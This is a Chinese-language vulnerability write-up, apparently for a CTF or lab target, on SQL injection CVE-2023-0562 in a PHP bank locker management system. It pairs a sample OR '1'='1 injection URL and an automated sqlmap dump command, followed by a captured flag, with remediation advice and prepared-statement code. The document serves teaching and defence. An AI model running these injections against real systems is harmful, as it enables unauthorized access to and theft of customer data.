CVE-2023-0562

CVE-2023-0562 是一个针对银行储物柜管理系统的SQL注入漏洞。该漏洞影响了储物柜管理系统中处理用户输入的部分，攻击者可以利用此漏洞未经授权地访问数据库中的敏感信息，甚至修改或删除数据。

---

漏洞概述

1. 漏洞编号：CVE-2023-0562
2. 漏洞类型：SQL注入 (SQL Injection)
3. 受影响的系统：银行储物柜管理系统
4. 漏洞描述：银行储物柜管理系统没有对输入参数进行充分验证，导致恶意用户能够通过注入SQL语句绕过身份验证或访问储物柜的敏感数据。

---

漏洞利用方式

攻击者通过操控输入字段（如 URL 参数、表单字段或 Cookie），注入恶意 SQL 代码。
以下为利用过程示例：

1. 目标系统功能：
假设储物柜管理系统提供了一个接口，用于查询储物柜详细信息：

http://example.com/safe-box.php?id=1

2. 正常查询：
系统可能执行以下 SQL 查询：

SELECT * FROM safeboxes WHERE id = '1';

3. 漏洞利用：
攻击者在 id 参数中注入 SQL 代码，例如：

http://example.com/safe-box.php?id=1' OR '1'='1

查询变为：

SELECT * FROM safeboxes WHERE id = '1' OR '1'='1';

这将绕过身份验证并返回所有储物柜的记录。

---

影响范围

1. 数据泄露：攻击者可获取储物柜详细信息，包括客户信息、储物柜位置、存储内容等。
2. 权限提升：通过注入恶意 SQL 代码，攻击者可以绕过管理员身份验证，获取系统管理权限。
3. 数据破坏：攻击者可能修改或删除数据库内容，导致系统不可用。
4. 服务中断：恶意查询可能造成数据库负载过高，从而影响服务正常运行。

---

修复建议

为了修复和避免此类漏洞，需要从代码、配置和开发流程等方面进行改进。

1. 使用预处理语句（Prepared Statements）
预处理语句可以防止用户输入被解释为SQL代码。例如，使用 MySQLi：

// 使用 MySQLi 的预处理语句
$id = $_GET['id'];
$stmt = $mysqli->prepare("SELECT * FROM safeboxes WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();

2. 验证和过滤用户输入
对所有用户输入进行严格的验证，确保仅接收符合预期的数据类型。例如：

if (!is_numeric($_GET['id'])) {
    die("Invalid ID");
}

3. 最小化数据库权限

• 仅授予数据库用户所需的最低权限，例如查询权限。
• 禁止使用具有 DROP 或 UPDATE 权限的数据库用户。

4. 开启错误日志
关闭生产环境中的详细错误信息显示，避免泄露数据库结构：

ini_set('display_errors', 0);
error_log("SQL Error: " . $mysqli->error);

5. 定期更新系统
检查并应用安全更新，以修复系统中可能存在的其他漏洞。

---

安全编码示例

以下是改进后的代码示例，展示如何安全地实现查询功能：

<?php
// 数据库连接
$mysqli = new mysqli("localhost", "user", "password", "database");

// 获取用户输入
$id = $_GET['id'];

// 输入验证
if (!is_numeric($id)) {
    die("Invalid Input");
}

// 预处理查询
$stmt = $mysqli->prepare("SELECT * FROM safeboxes WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();

// 输出结果
if ($row = $result->fetch_assoc()) {
    echo "储物柜详情: " . htmlspecialchars(json_encode($row));
} else {
    echo "未找到储物柜信息";
}

$stmt->close();
$mysqli->close();
?>

---

靶标介绍

银行储物柜管理系统是一个基于网络的应用程序，用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

---

自动注入：
先是登录界面

抓包可以得到报文

将它保存一下，就进行sqlmap自动注入

sqlmap -r 1.txt --batch --dump

flag{772de145-a4ea-4c40-a28c-b0463afe1b33} 

在搜索页面也可以找到注入点的。